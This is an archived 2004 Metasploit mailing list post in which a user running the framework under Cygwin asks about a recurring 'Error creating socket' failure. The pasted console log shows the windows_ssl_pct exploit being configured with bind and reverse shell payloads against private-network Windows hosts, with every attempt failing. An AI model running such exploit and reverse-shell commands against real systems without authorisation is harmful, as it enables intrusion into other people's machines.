Metasploit mailing list archives
Error creating socket: Connection failed:
From: gatekeeper at globenet.com.ph (gatekeeper)
Date: Fri, 20 Aug 2004 15:28:52 +0800
Hi, I am running metasploit within cgywin. I always get this error: [*] Error creating socket: Connection failed: Operation now in progress Am I missing a libpcap here or something? Please advice. Thank you. jun g. "hiding in plain sight" =================================================== msf windows_ssl_pct > set PAYLOAD win32_bind PAYLOAD -> win32_bind msf windows_ssl_pct(win32_bind) > exploit RHOST [*] WARNING: the correct case of the 'target' variable is 'TARGET' [*] Starting Bind Handler. [*] Attempting to exploit target Windows XP SP0 [*] Error creating socket: Connection failed: Operation now in progress [*] Exiting Bind Handler. msf windows_ssl_pct(win32_bind) > set target 6 target -> 6 msf windows_ssl_pct(win32_bind) > set Avoid: 0 Keys: win32_bind PAYLOAD: win32_bind RHOST: 192.168.3.3 Space: 1800 target: 6 msf windows_ssl_pct(win32_bind) > exploit [*] WARNING: the correct case of the 'target' variable is 'TARGET' [*] Starting Bind Handler. [*] Attempting to exploit target Windows XP SP1 [*] Error creating socket: Connection failed: Operation now in progress [*] Exiting Bind Handler. msf windows_ssl_pct(win32_bind) > set RHOST 192.168.3.9 RHOST -> 192.168.3.9 msf windows_ssl_pct(win32_bind) > exploit [*] WARNING: the correct case of the 'target' variable is 'TARGET' [*] Starting Bind Handler. [*] Attempting to exploit target Windows XP SP1 [*] Error creating socket: Connection failed: Operation now in progress [*] Exiting Bind Handler. msf windows_ssl_pct(win32_bind) > set PAYLOAD win32_reverse PAYLOAD -> win32_reverse msf windows_ssl_pct(win32_reverse) > exploit Error: Missing required option: LHOST msf windows_ssl_pct(win32_reverse) > set LHOST 192.168.3.3 LHOST -> 192.168.3.3 msf windows_ssl_pct(win32_reverse) > set Avoid: 0 Keys: win32_bind LHOST: 192.168.3.3 PAYLOAD: win32_reverse RHOST: 192.168.3.9 Space: 1800 target: 6 msf windows_ssl_pct(win32_reverse) > exploit [*] WARNING: the correct case of the 'target' variable is 'TARGET' [*] Starting Reverse Handler. [*] Attempting to exploit target Windows XP SP1 [*] Error creating socket: Connection failed: Operation now in progress [*] Exiting Reverse Handler. msf windows_ssl_pct(win32_reverse) > ===================================================
Current thread:
- Error creating socket: Connection failed: gatekeeper (Aug 20)
- Error creating socket: Connection failed: H D Moore (Aug 20)